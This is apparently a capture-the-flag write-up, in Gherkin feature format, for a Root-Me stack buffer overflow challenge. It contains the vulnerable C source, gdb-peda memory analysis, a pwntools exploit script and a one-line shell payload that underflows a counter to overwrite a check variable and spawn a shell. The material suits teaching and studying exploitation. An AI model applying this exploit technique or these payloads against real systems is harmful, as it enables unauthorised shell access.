# Version: 1.4.0
# language: en

  Feature:
    TOE:
      Rootme
    Category:
      App - System
    Challenge name:
      ELF x86 Stack buffer overflow basic 3
    CWE:
      CWE-121: Stack-based Buffer Overflow
    Goals:
      Get shell function execution

    Background:
    Hacker's software:
      | <Name>        | <Version>  |
      | Gdb-peda      | 8.1.1      |
      | Pwntools      | 3.12.1     |
    TOE information:
      Given a binary that asks for a name and creates a loop to ask for numbers
      And the binary is running on medium security_level

    Scenario: Normal use case
    Enter data into the binary
      Given the source code of binary:
      """
      /*

      gcc -m32 -o ch16 ch16.c

      */

      #include <stdio.h>
      #include <sys/time.h>
      #include <sys/types.h>
      #include <unistd.h>

      void shell(void);

      int main()
      {

      char buffer[64];
      int check;
      int i = 0;
      int count = 0;

      printf("Enter your name: ");
      fflush(stdout);
      while(1)
      {
        if(count >= 64)
          printf("Oh no...Sorry !\n");
        if(check == 0xbffffabc)
          shell();
        else
        {
          read(fileno(stdin),&i,1);
          switch(i)
          {
            case '\n':
              printf("\a");
              break;
            case 0x08:
              count--;
              printf("\b");
              break;
            case 0x04:
              printf("\t");
              count++;
              break;
            case 0x90:
              printf("\a");
              count++;
              break;
            default:
              buffer[count] = i;
              count++;
              break;
            }
          }
        }
      }

      void shell(void)
      {
        system("/bin/dash");
      }
      """
      And the ssh access of challenge:
      """
      ssh -p 2222 app-systeme-ch16@challenge02.root-me.org
      """
      Then I download the binary to analyze it comfortably:
      """
      scp -P 2222 app-systeme-ch16@challenge02.root-me.org:ch16 .
      """
      Then I enter the some numbers
      And I see that it never leaves the loop

    Scenario: Static detection
    Identifying bug
      Given shell function is only accessed if the check variable is 0xbffffabc
      And according to the source, it's under the buffer
      Then the program has a switch for different numbers (0x08, 0x04, 0x90)
      And only 0x08 decreases the counter, the others increase it
      And the buffer is filled by default, if these numbers are not entered
      Then knowing this, I could get to the check variable overflowing the buff
      Then or if check is before the buffer, going back the counter with 0x08

    Scenario: Dynamic detection
    Check variable
      When I see memory when compares the check variable
      Then I see the check variable is above the buffer
      """
      [-------------------------------------code------------------------------]
      0x8048598 <main+68>: jle    0x80485a6 <main+82>
      0x804859a <main+70>: mov    DWORD PTR [esp],0x8048762
      0x80485a1 <main+77>: call   0x8048440 <puts@plt>
      => 0x80485a6 <main+82>: cmp    DWORD PTR [esp+0x18],0xbffffabc
      0x80485ae <main+90>: jne    0x80485b7 <main+99>
      0x80485b0 <main+92>: call   0x8048661 <shell>
      0x80485b5 <main+97>: jmp    0x8048593 <main+63>
      0x80485b7 <main+99>: mov    eax,ds:0x804a040
      [------------------------------------stack------------------------------]
      0000| 0xffb3ea30 --> 0x0
      0004| 0xffb3ea34 --> 0xffb3ea40 --> 0x32 ('2')
      0008| 0xffb3ea38 --> 0x1
      0012| 0xffb3ea3c --> 0x0
      0016| 0xffb3ea40 --> 0x32 ('2')
      0020| 0xffb3ea44 --> 0x9 ('\t')
      0024| 0xffb3ea48 --> 0xf7cf59b9 (<__new_exitfn+9>:   add    ebx,0x1a746b)
      0028| 0xffb3ea4c ("112345132\237\004\b\001")
      [-----------------------------------------------------------------------]
      Legend: code, data, rodata, value

      Breakpoint 1, 0x080485a6 in main ()
      gdb-peda$ x/2xw $esp + 0x18
      0xffb3ea48:     0xf7cf59b9      0x33323131
      gdb-peda$
      """
      Then I know I need to do the counter < 0 to get to check variable
      Then to go back the counter I saw that it is the number 8 in the switch
      """
      case 0x08:
        count--;
        printf("\b");
        break;
      """
      Then as I see it is a binary of x86 because of registers
      Then I need the counter 4 bytes before the buffer
      And then set the correct value for check and you're done

    Scenario: Exploitation
    Obtaining the execution of the system function
      Then Already knowing how to exploit the binary
      Then What's left is to do the exploit
      Then I'll use pwntools to interact with the binary
      And then the exploit in local would look like this:
      """
      from pwn import *

      p = process('./ch16')

      p.recvuntil('Enter your name:')

      i = 0
      while (i < 4):
        p.sendline('\x08')
        i += 1

      p.sendline(p32(0xbffffabc))

      p.interactive()
      """
      Then now I try to run the exploit on the server
      And I see I don't have write permission in the directory
      Then I create the exploit in /tmp/
      And I see that the pwntools python library is not installed in the system
      Then seeing the source again I see that read function reads only one byte:
      """
      read(fileno(stdin),&i,1);
      """
      Then it's not necessary to send it a '\n'
      And the exploit would look like this:
      """
      (python -c 'print "\x08"*4 + "\xbc\xfa\xff\xbf"';cat;) | ./ch16
      """
      And I used cat when sending the payload because calling the shell function
      Then opens a shell and I must maintain the stdin up
      And ready I already have shell of the system
